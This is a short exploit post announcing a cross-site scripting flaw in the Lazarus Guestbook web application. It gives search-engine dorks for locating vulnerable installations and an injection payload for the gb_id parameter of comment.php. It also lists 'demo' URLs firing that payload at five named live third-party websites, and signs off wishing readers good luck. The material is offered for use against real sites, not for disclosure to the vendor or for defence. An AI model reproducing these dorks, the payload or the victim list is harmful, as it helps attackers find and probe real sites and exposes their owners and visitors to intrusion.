facebook facebook twitter rss

Lazarus Guestbook Cross Site Scriptingn XSS

Author: wlhaan hacker , Published: 04-11-2014
_____________________________________________________
Lazarus Guestbook) Cross Site Scriptingn XSS )

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : http://carbonize.co.uk
# [+]download:http://carbonize.co.uk/Lazarus/files/gbdownload.php
# [+] team wlhaan Hacker #
# [+] Dork : Powered by Lazarus Guestbook from carbonize.co.uk

dork 2

inurl:"admin.php?included=1"

#####################################################

The exploit :
comment.php?gb_id=29.htaccess.aspx-->">'>'"<vvv000005v738566>

http://localhost/PATH/comment.php?gb_id=29.htaccess.aspx-->">'>'"<vvv000005v738566>

#####################################################

DEMO
http://www.chastaincentral.com/lazarusgb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E

http://www.natural-light.org/lazarusgb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E

http://www.milkandhoneyfarm.com/lazarusgb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E

http://www.fowlplayguideservice.com/lazarusgb2/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E

http://107exito.com.gt/gb/comment.php?gb_id=29.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000005v738566%3E


#####################################################

and good luck :D

Thanks to : shooq hacker ..


Discovered By : wlhaan hacker


https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani

#####################################################

Like us on Facebook :